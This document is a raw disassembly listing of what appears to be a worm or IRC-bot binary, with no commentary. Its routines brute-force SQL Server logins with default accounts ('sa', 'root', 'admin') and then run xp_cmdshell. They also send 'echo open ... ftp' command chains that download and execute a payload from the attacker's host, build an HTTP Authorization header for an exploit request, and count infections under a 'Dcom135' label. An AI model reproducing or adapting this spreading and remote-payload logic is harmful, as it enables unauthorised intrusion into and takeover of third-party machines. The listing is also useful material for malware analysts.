loc_4046EB: ; CODE XREF: sub_40467C+5A�j
; sub_40467C+6A�j
mov [ebp-28h], ebx
mov [ebp-24h], edi
fild qword ptr [ebp-28h]
push ecx
push ecx ; double
fmul dbl_421250
fstp [esp+40h+var_40]
call sub_415E4B
pop ecx
pop ecx
call sub_415E24
cmp ebx, edi
mov [ebp-1Ch], eax
jbe short loc_40472A
mov esi, [ebp+0Ch]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp-10h]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40472A: ; CODE XREF: sub_40467C+94�j
mov cl, [ebp-10h]
mov dl, [ebp-10h]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp-14h], cl
mov cl, [ebp-0Fh]
sar cl, 4
and cl, 0Fh
add [ebp+0Ch], ebx
shl dl, 4
add cl, dl
mov dl, [ebp-0Fh]
mov [ebp-13h], cl
mov cl, [ebp-0Eh]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp-12h], cl
mov cl, [ebp-0Eh]
and cl, 3Fh
cmp eax, edi
mov [ebp-11h], cl
jbe short loc_404798
add [ebp-18h], eax
loc_40477C: ; CODE XREF: sub_40467C+11A�j
movsx eax, byte ptr [ebp+esi-14h]
lea ecx, [ebp-38h]
mov al, byte_426208[eax]
push eax
push 1
call sub_404ADF
inc esi
cmp esi, [ebp-1Ch]
jb short loc_40477C
loc_404798: ; CODE XREF: sub_40467C+FB�j
cmp dword ptr [ebp-18h], 48h
jb short loc_4047B6
push dword ptr [ebp+14h]
call sub_415B10
pop ecx
push eax
lea ecx, [ebp-38h]
push dword ptr [ebp+14h]
call sub_404B39
mov [ebp-18h], edi
loc_4047B6: ; CODE XREF: sub_40467C+120�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_4047D0
sub esi, [ebp-1Ch]
loc_4047C1: ; CODE XREF: sub_40467C+152�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_404ADF
dec esi
jnz short loc_4047C1
loc_4047D0: ; CODE XREF: sub_40467C+140�j
cmp [ebp+10h], edi
ja loc_4046CD
xor ebx, ebx
inc ebx
loc_4047DC: ; CODE XREF: sub_40467C+48�j
mov esi, [ebp+8]
mov al, [ebp-38h]
push edi
mov ecx, esi
mov [esi], al
call sub_404CE4
push 0FFFFFFFFh
lea eax, [ebp-38h]
push edi
push eax
mov ecx, esi
call sub_404B91
mov [ebp-20h], ebx
and byte ptr [ebp-4], 0
push ebx
lea ecx, [ebp-38h]
call sub_404CE4
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40467C endp
; =============== S U B R O U T I N E =======================================
sub_40481B proc near ; CODE XREF: .text:00404A16�p
mov eax, offset loc_420B80
call sub_4162F0
sub esp, 10h
push ebx
push esi
push edi
push offset byte_43B658
lea eax, [ebp-1Ch]
push dword ptr [ebp+10h]
xor ebx, ebx
mov [ebp-4], ebx
push dword ptr [ebp+0Ch]
push eax
call sub_40467C
mov eax, [ebp+1Ch]
mov ecx, [ebp-14h]
mov byte ptr [ebp-4], 1
lea esi, [ecx+eax+36h]
push esi
call sub_415BE9
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_404865
xor bl, bl
jmp short loc_4048A9
; ---------------------------------------------------------------------------
loc_404865: ; CODE XREF: sub_40481B+44�j
mov ecx, [ebp-18h]
mov eax, offset dword_421258
cmp ecx, ebx
jnz short loc_404873
mov ecx, eax
loc_404873: ; CODE XREF: sub_40481B+54�j
cmp [ebp+18h], ebx
jz short loc_40487B
mov eax, [ebp+18h]
loc_40487B: ; CODE XREF: sub_40481B+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41588A
add esp, 14h
push ebx
push esi
push edi
push dword ptr [ebp+8]
call dword_43CA74 ; send
cmp eax, esi
jz short loc_4048A0
xor bl, bl
jmp short loc_4048A2
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_40481B+7F�j
mov bl, 1
loc_4048A2: ; CODE XREF: sub_40481B+83�j
push edi
call sub_415C9B
pop ecx
loc_4048A9: ; CODE XREF: sub_40481B+48�j
and byte ptr [ebp-4], 0
push 1
lea ecx, [ebp-1Ch]
call sub_404CE4
or dword ptr [ebp-4], 0FFFFFFFFh
push 1
lea ecx, [ebp+14h]
call sub_404CE4
mov ecx, [ebp-0Ch]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40481B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 620h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push offset sub_4263B8
push eax
call sub_4153F0
add esp, 0Ch
mov eax, offset byte_42C2B4
push eax
push eax
push dword_43B670
push dword ptr [ebp+8]
call sub_40A08A
pop ecx
push eax
push offset aCmdKEchoOpenSD ; "cmd /k echo open %s %d > o&echo user 1 "...
lea eax, [ebp-391h]
push 400h
push eax
call sub_41588A
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset sub_426250
push eax
call sub_4040E5
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_404972
xor eax, eax
jmp loc_404AD2
; ---------------------------------------------------------------------------
loc_404972: ; CODE XREF: .text:00404969�j
mov [ebp-0Ch], esi
loc_404975: ; CODE XREF: .text:00404A75�j
test esi, esi
jnz loc_404A7B
push 6
push 1
push 2
call dword_4211E4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_404A63
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call dword_43CA24 ; ntohs
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call dword_43CA64 ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jz loc_404A58
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_404A20
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call sub_404CE4
lea eax, [ebp+0Ch]
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call sub_404D1C
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40481B
add esp, 1Ch
jmp short loc_404A55
; ---------------------------------------------------------------------------
loc_404A20: ; CODE XREF: .text:004049DE�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_404A3A
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_4045DE
jmp short loc_404A52
; ---------------------------------------------------------------------------
loc_404A3A: ; CODE XREF: .text:00404A2A�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_404A58
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_4044FF
loc_404A52: ; CODE XREF: .text:00404A38�j
add esp, 0Ch
loc_404A55: ; CODE XREF: .text:00404A1E�j
movzx esi, al
loc_404A58: ; CODE XREF: .text:004049D1�j
; .text:00404A44�j
push ebx
call dword_43CABC ; closesocket
test esi, esi
jnz short loc_404A6E
loc_404A63: ; CODE XREF: .text:0040498E�j
push 3E8h
call dword_421060 ; Sleep
loc_404A6E: ; CODE XREF: .text:00404A61�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_404975
loc_404A7B: ; CODE XREF: .text:00404977�j
lea ecx, [ebp-8]
call sub_403F12
test esi, esi
jz short loc_404AD0
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset dword_42647C
lea eax, [ebp-620h]
push 200h
push eax
call sub_41588A
lea eax, [ebp-620h]
push eax
call sub_40B078
mov eax, [ebp+0B0h]
add esp, 18h
imul eax, 3Ch
lea eax, dword_427390[eax]
inc dword ptr [eax]
loc_404AD0: ; CODE XREF: .text:00404A85�j
mov eax, esi
loc_404AD2: ; CODE XREF: .text:0040496D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_420B44
loc_404AD7: ; CODE XREF: sub_420B44+3�j
; .text:00420B5D�j ...
push 1
call sub_404CE4
retn
; END OF FUNCTION CHUNK FOR sub_420B44
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404ADF proc near ; CODE XREF: sub_40467C+111�p
; sub_40467C+14C�p
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
or eax, 0FFFFFFFFh
push edi
sub eax, [esi+8]
cmp eax, [ebp+arg_0]
ja short loc_404AF6
call sub_4206B0
loc_404AF6: ; CODE XREF: sub_404ADF+10�j
cmp [ebp+arg_0], 0
jbe short loc_404B31
mov edi, [esi+8]
push 0
add edi, [ebp+arg_0]
mov ecx, esi
push edi
call sub_404C5E
test al, al
jz short loc_404B31
movsx eax, [ebp+arg_4]
push [ebp+arg_0]
push eax
mov eax, [esi+4]
add eax, [esi+8]
push eax
call sub_415390
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_404B31: ; CODE XREF: sub_404ADF+1B�j
; sub_404ADF+2F�j
mov eax, esi
pop edi
pop esi
pop ebp
retn 8
sub_404ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404B39 proc near ; CODE XREF: sub_40467C+132�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, ecx
or eax, 0FFFFFFFFh
push edi
sub eax, [esi+8]
cmp eax, [ebp+arg_4]
ja short loc_404B50
call sub_4206B0
loc_404B50: ; CODE XREF: sub_404B39+10�j
cmp [ebp+arg_4], 0
jbe short loc_404B89
mov edi, [esi+8]
push 0
add edi, [ebp+arg_4]
mov ecx, esi
push edi
call sub_404C5E
test al, al
jz short loc_404B89
push [ebp+arg_4]
mov eax, [esi+8]
add eax, [esi+4]
push [ebp+arg_0]
push eax
call sub_4153F0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_404B89: ; CODE XREF: sub_404B39+1B�j
; sub_404B39+2F�j
mov eax, esi
pop edi
pop esi
pop ebp
retn 8
sub_404B39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404B91 proc near ; CODE XREF: sub_40467C+179�p
; sub_42070A+46�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov edi, ecx
cmp [ebx+8], eax
jnb short loc_404BA9
call sub_4208DC
loc_404BA9: ; CODE XREF: sub_404B91+11�j
mov eax, [ebx+8]
mov ecx, [ebp+arg_4]
mov esi, eax
sub esi, ecx
cmp [ebp+arg_8], esi
jnb short loc_404BBB
mov esi, [ebp+arg_8]
loc_404BBB: ; CODE XREF: sub_404B91+25�j
cmp edi, ebx
jnz short loc_404BD9
add esi, ecx
push 0FFFFFFFFh
push esi
mov ecx, edi
call sub_404D51
push [ebp+arg_4]
mov ecx, edi
push 0
call sub_404D51
jmp short loc_404C55
; ---------------------------------------------------------------------------
loc_404BD9: ; CODE XREF: sub_404B91+2C�j
test esi, esi
jbe short loc_404C1C
cmp esi, eax
jnz short loc_404C1C
mov eax, [ebx+4]
test eax, eax
jnz short loc_404BED
mov eax, offset dword_421258
loc_404BED: ; CODE XREF: sub_404B91+55�j
cmp byte ptr [eax-1], 0FEh
jnb short loc_404C1C
push 1
mov ecx, edi
call sub_404CE4
mov eax, [ebx+4]
test eax, eax
jnz short loc_404C08
mov eax, offset dword_421258
loc_404C08: ; CODE XREF: sub_404B91+70�j
mov [edi+4], eax
mov ecx, [ebx+8]
mov [edi+8], ecx
mov ecx, [ebx+0Ch]
mov [edi+0Ch], ecx
inc byte ptr [eax-1]
jmp short loc_404C55
; ---------------------------------------------------------------------------
loc_404C1C: ; CODE XREF: sub_404B91+4A�j
; sub_404B91+4E�j ...
push 1
push esi
mov ecx, edi
call sub_404C5E
test al, al
jz short loc_404C55
mov eax, [ebp+arg_0]
mov eax, [eax+4]
test eax, eax
jnz short loc_404C39
mov eax, offset dword_421258
loc_404C39: ; CODE XREF: sub_404B91+A1�j
mov ecx, [ebp+arg_4]
push esi
add eax, ecx
push eax
push dword ptr [edi+4]
call sub_4153F0
mov eax, [edi+4]
add esp, 0Ch
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_404C55: ; CODE XREF: sub_404B91+46�j
; sub_404B91+89�j ...
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_404B91 endp
; =============== S U B R O U T I N E =======================================
sub_404C5E proc near ; CODE XREF: sub_40467C+3D�p
; sub_404ADF+28�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
cmp edi, 0FFFFFFFDh
jbe short loc_404C70
call sub_4206B0
loc_404C70: ; CODE XREF: sub_404C5E+B�j
mov eax, [esi+4]
xor edx, edx
cmp eax, edx
jz short loc_404C98
mov cl, [eax-1]
cmp cl, dl
jz short loc_404C98
cmp cl, 0FFh
jz short loc_404C98
cmp edi, edx
mov ecx, esi
jnz short loc_404CD7
dec byte ptr [eax-1]
push edx
loc_404C8F: ; CODE XREF: sub_404C5E+48�j
call sub_404CE4
loc_404C94: ; CODE XREF: sub_404C5E+4C�j
; sub_404C5E+53�j
xor al, al
jmp short loc_404CDF
; ---------------------------------------------------------------------------
loc_404C98: ; CODE XREF: sub_404C5E+19�j
; sub_404C5E+20�j ...
cmp edi, edx
jnz short loc_404CB3
cmp [esp+8+arg_4], dl
jz short loc_404CA8
push 1
mov ecx, esi
jmp short loc_404C8F
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_404C5E+42�j
cmp eax, edx
jz short loc_404C94
mov [esi+8], edx
mov [eax], dl
jmp short loc_404C94
; ---------------------------------------------------------------------------
loc_404CB3: ; CODE XREF: sub_404C5E+3C�j
cmp [esp+8+arg_4], dl
jz short loc_404CD0
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_404CC5
cmp eax, edi
jnb short loc_404CDD
loc_404CC5: ; CODE XREF: sub_404C5E+61�j
push 1
mov ecx, esi
call sub_404CE4
jmp short loc_404CD5
; ---------------------------------------------------------------------------
loc_404CD0: ; CODE XREF: sub_404C5E+59�j
cmp [esi+0Ch], edi
jnb short loc_404CDD
loc_404CD5: ; CODE XREF: sub_404C5E+70�j
mov ecx, esi
loc_404CD7: ; CODE XREF: sub_404C5E+2B�j
push edi
call sub_404DB8
loc_404CDD: ; CODE XREF: sub_404C5E+65�j
; sub_404C5E+75�j
mov al, 1
loc_404CDF: ; CODE XREF: sub_404C5E+38�j
pop edi
pop esi
retn 8
sub_404C5E endp
; =============== S U B R O U T I N E =======================================
sub_404CE4 proc near ; CODE XREF: sub_40467C+1F�p
; sub_40467C+16B�p ...
arg_0 = byte ptr 4
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_404D0C
mov eax, [esi+4]
test eax, eax
jz short loc_404D0C
dec eax
mov cl, [eax]
test cl, cl
jz short loc_404D05
cmp cl, 0FFh
jz short loc_404D05
dec byte ptr [eax]
jmp short loc_404D0C
; ---------------------------------------------------------------------------
loc_404D05: ; CODE XREF: sub_404CE4+16�j
; sub_404CE4+1B�j
push eax
call sub_41630F
pop ecx
loc_404D0C: ; CODE XREF: sub_404CE4+8�j
; sub_404CE4+F�j ...
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn 4
sub_404CE4 endp
; =============== S U B R O U T I N E =======================================
sub_404D1C proc near ; CODE XREF: .text:00404A0A�p
; sub_404E75+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
mov edi, [esp+8+arg_4]
push 1
push edi
mov esi, ecx
call sub_404C5E
test al, al
jz short loc_404D4A
push edi
push [esp+0Ch+arg_0]
push dword ptr [esi+4]
call sub_4153F0
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_404D4A: ; CODE XREF: sub_404D1C+12�j
mov eax, esi
pop edi
pop esi
retn 8
sub_404D1C endp
; =============== S U B R O U T I N E =======================================
sub_404D51 proc near ; CODE XREF: sub_404B91+35�p
; sub_404B91+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_404D64
call sub_4208DC
loc_404D64: ; CODE XREF: sub_404D51+C�j
mov ecx, edi
call sub_404E75
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_404D7A
mov ebx, eax
loc_404D7A: ; CODE XREF: sub_404D51+25�j
test ebx, ebx
jbe short loc_404DB0
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax
lea eax, [ecx+ebx]
push eax
push ecx
call sub_416320
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_404C5E
test al, al
jz short loc_404DB0
mov eax, [edi+4]
mov [edi+8], esi
and byte ptr [esi+eax], 0
loc_404DB0: ; CODE XREF: sub_404D51+2B�j
; sub_404D51+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_404D51 endp
; =============== S U B R O U T I N E =======================================
sub_404DB8 proc near ; CODE XREF: sub_404C5E+7A�p
mov eax, offset loc_420B8C
call sub_4162F0
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+8]
or edi, 1Fh
mov esi, ecx
cmp edi, 0FFFFFFFDh
mov [ebp-10h], esp
mov [ebp-14h], esi
jbe short loc_404DDE
mov edi, [ebp+8]
loc_404DDE: ; CODE XREF: sub_404DB8+21�j
and dword ptr [ebp-4], 0
lea eax, [edi+2]
test eax, eax
jge short loc_404DEB
xor eax, eax
loc_404DEB: ; CODE XREF: sub_404DB8+2F�j
push eax
call sub_416655
pop ecx
mov [ebp+8], eax
jmp short loc_404E1C
; ---------------------------------------------------------------------------
loc_404DF7: ; DATA XREF: .text:00421F04�o
mov eax, [ebp+8]
mov [ebp-18h], eax
add eax, 2
test eax, eax
jge short loc_404E06
xor eax, eax
loc_404E06: ; CODE XREF: sub_404DB8+4A�j
push eax
call sub_416655
mov [ebp+8], eax
pop ecx
mov eax, offset loc_404E16
retn
; ---------------------------------------------------------------------------
loc_404E16: ; DATA XREF: sub_404DB8+58�o
mov esi, [ebp-14h]
mov edi, [ebp-18h]
loc_404E1C: ; CODE XREF: sub_404DB8+3D�j
mov eax, [esi+8]
test eax, eax
jbe short loc_404E3A
cmp eax, edi
jbe short loc_404E29
mov eax, edi
loc_404E29: ; CODE XREF: sub_404DB8+6D�j
push eax
mov eax, [ebp+8]
push dword ptr [esi+4]
inc eax
push eax
call sub_4153F0
add esp, 0Ch
loc_404E3A: ; CODE XREF: sub_404DB8+69�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_404CE4
mov eax, [ebp+8]
inc eax
mov [esi+4], eax
and byte ptr [eax-1], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_404E5A
mov edi, ebx
loc_404E5A: ; CODE XREF: sub_404DB8+9E�j
mov eax, [esi+4]
mov ecx, [ebp-0Ch]
mov [esi+8], edi
and byte ptr [edi+eax], 0
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_404DB8 endp
; =============== S U B R O U T I N E =======================================
sub_404E75 proc near ; CODE XREF: sub_404D51+15�p
push esi
push edi
mov edi, ecx
mov esi, [edi+4]
test esi, esi
jz short loc_404EA2
mov al, [esi-1]
test al, al
jz short loc_404EA2
cmp al, 0FFh
jz short loc_404EA2
push 1
call sub_404CE4
push esi
call sub_415B10
pop ecx
push eax
push esi
mov ecx, edi
call sub_404D1C
loc_404EA2: ; CODE XREF: sub_404E75+9�j
; sub_404E75+10�j ...
pop edi
pop esi
retn
sub_404E75 endp
; =============== S U B R O U T I N E =======================================
sub_404EA5 proc near ; DATA XREF: .text:00423008�o
test byte_46BDF4, 1
jnz short loc_404EB5
or byte_46BDF4, 1
loc_404EB5: ; CODE XREF: sub_404EA5+7�j
jmp $+5
push offset nullsub_1
call sub_4166D0
pop ecx
retn
sub_404EA5 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404EC7 proc near ; CODE XREF: .text:00405120�p
var_E2C = byte ptr -0E2Ch
var_A2C = byte ptr -0A2Ch
var_62C = byte ptr -62Ch
var_22C = byte ptr -22Ch
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
sub esp, 0E2Ch
mov al, byte_43B658
push esi
mov [ebp+var_1], al
lea eax, [ebp+var_14]
xor esi, esi
push eax
push esi
push 1
mov [ebp+var_2C], offset aSa ; "sa"
mov [ebp+var_28], offset aRoot ; "root"
mov [ebp+var_24], offset aAdmin ; "admin"
mov [ebp+var_20], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
mov [ebp+var_8], esi
call dword_43C9A8
test ax, ax
jnz short loc_404F25
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+var_14]
call dword_43CAAC
test ax, ax
jz short loc_404F2C
loc_404F25: ; CODE XREF: sub_404EC7+45�j
xor eax, eax
jmp loc_4050FC
; ---------------------------------------------------------------------------
loc_404F2C: ; CODE XREF: sub_404EC7+5C�j
lea eax, [ebp+var_10]
push eax
push [ebp+var_14]
push 2
call dword_43C9A8
test ax, ax
jnz loc_4050EF
push ebx
lea eax, [ebp+var_2C]
push edi
mov edi, dword_421060
mov [ebp+var_C], eax
mov ebx, offset byte_42C2B4
loc_404F57: ; CODE XREF: sub_404EC7+1C4�j
cmp off_42C440, esi
jz loc_405082
mov eax, offset off_42C440
mov esi, eax
loc_404F6A: ; CODE XREF: sub_404EC7+118�j
lea ecx, [ebp+var_1]
push ecx
push dword ptr [eax]
mov eax, [ebp+var_C]
push dword ptr [eax]
lea eax, [ebp+arg_4]
push [ebp+arg_A0]
push eax
lea eax, [ebp+var_A2C]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_415316
add esp, 1Ch
lea eax, [ebp+var_1A]
push 0
push eax
lea eax, [ebp+var_E2C]
push 400h
push eax
lea eax, [ebp+var_A2C]
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_A2C]
push eax
push 0
push [ebp+var_10]
call dword_43CA60
test ax, ax
jz short loc_404FE6
cmp ax, 1
jz short loc_404FE6
push 1F4h
call edi ; Sleep
add esi, 4
mov eax, esi
cmp dword ptr [esi], 0
jnz short loc_404F6A
jmp loc_405080
; ---------------------------------------------------------------------------
loc_404FE6: ; CODE XREF: sub_404EC7+101�j
; sub_404EC7+107�j
lea eax, [ebp+var_8]
push eax
push [ebp+var_10]
push 3
call dword_43C9A8
push ebx
push ebx
call sub_415372
push eax
call sub_415372
push eax
push dword_43B670
push [ebp+arg_0]
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_62C]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'del eq&echo o"...
push eax
call sub_415316
add esp, 20h
lea eax, [ebp+var_62C]
push 0FFFFFFFDh
push eax
push [ebp+var_8]
call dword_43C9E8
test ax, ax
jz short loc_405075
mov esi, 1388h
push esi
call edi ; Sleep
push ebx
lea eax, [ebp+var_62C]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell '%s'"
push eax
call sub_415316
add esp, 0Ch
lea eax, [ebp+var_62C]
push 0FFFFFFFDh
push eax
push [ebp+var_8]
call dword_43C9E8
test ax, ax
jz short loc_405093
push esi
call edi ; Sleep
loc_405075: ; CODE XREF: sub_404EC7+175�j
push [ebp+var_8]
push 3
call dword_43CA40
loc_405080: ; CODE XREF: sub_404EC7+11A�j
xor esi, esi
loc_405082: ; CODE XREF: sub_404EC7+96�j
add [ebp+var_C], 4
mov eax, [ebp+var_C]
cmp [eax], esi
jnz loc_404F57
jmp short loc_4050DF
; ---------------------------------------------------------------------------
loc_405093: ; CODE XREF: sub_404EC7+1A9�j
cmp [ebp+arg_B4], 0
mov [ebp+var_18], 1
jnz short loc_4050C1
push 0
lea eax, [ebp+var_22C]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_4050C1: ; CODE XREF: sub_404EC7+1DA�j
lea eax, [ebp+var_22C]
push eax
call sub_40B078
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
lea eax, dword_427390[eax]
inc dword ptr [eax]
loc_4050DF: ; CODE XREF: sub_404EC7+1CA�j
push [ebp+var_10]
push 2
call dword_43CA40
mov esi, [ebp+var_18]
pop edi
pop ebx
loc_4050EF: ; CODE XREF: sub_404EC7+77�j
push [ebp+var_14]
push 1
call dword_43CA40
mov eax, esi
loc_4050FC: ; CODE XREF: sub_404EC7+60�j
pop esi
leave
retn
sub_404EC7 endp
; ---------------------------------------------------------------------------
push esi
push edi
sub esp, 0BCh
lea esi, [esp+0C8h]
mov dword ptr [esp+168h], 599h
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404EC7
push 2Fh
lea esi, [esp+0CCh]
pop ecx
mov dword ptr [esp+168h], 1BDh
mov edi, esp
rep movsd
call sub_403C74
add esp, 0BCh
xor eax, eax
inc eax
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40514F proc near ; CODE XREF: .text:0040534D�p
var_5A0 = byte ptr -5A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_415390
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+var_10], 2
push eax
call dword_43CA64 ; inet_addr
mov [ebp+var_C], eax
mov ax, word_426744
push eax
call dword_43CA24 ; ntohs
push esi
push 1
push 2
mov [ebp+var_E], ax
call dword_43CAA4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_405268
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jz loc_405268
push esi
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_43CA3C ; recv
mov esi, offset byte_42C2B4
push esi
push esi
push dword_43B670
push [ebp+arg_0]
call sub_40A08A
pop ecx
mov edi, 190h
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41588A
add esp, 1Ch
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jz short loc_405268
push 1F4h
call dword_421060 ; Sleep
push esi
push offset dword_425090
lea eax, [ebp+var_1A0]
push edi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_1A0]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push ebx
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40526C
loc_405268: ; CODE XREF: sub_40514F+51�j
; sub_40514F+67�j ...
xor al, al
jmp short loc_40528A
; ---------------------------------------------------------------------------
loc_40526C: ; CODE XREF: sub_40514F+117�j
push 0
lea eax, [ebp+var_5A0]
push 400h
push eax
push ebx
call dword_43CA3C ; recv
push ebx
call dword_43CABC ; closesocket
mov al, 1
loc_40528A: ; CODE XREF: sub_40514F+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40514F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
lea eax, [ebp+0Ch]
push edi
push eax
call dword_4211CC ; gethostbyname
mov esi, eax
test esi, esi
jnz short loc_4052B9
lea eax, [ebp+0Ch]
push eax
call dword_4211DC ; inet_addr
mov ebx, eax
jmp short loc_4052BF
; ---------------------------------------------------------------------------
loc_4052B9: ; CODE XREF: .text:004052A9�j
mov ebx, [ebp+0C0h]
loc_4052BF: ; CODE XREF: .text:004052B7�j
push 11h
push 2
push 2
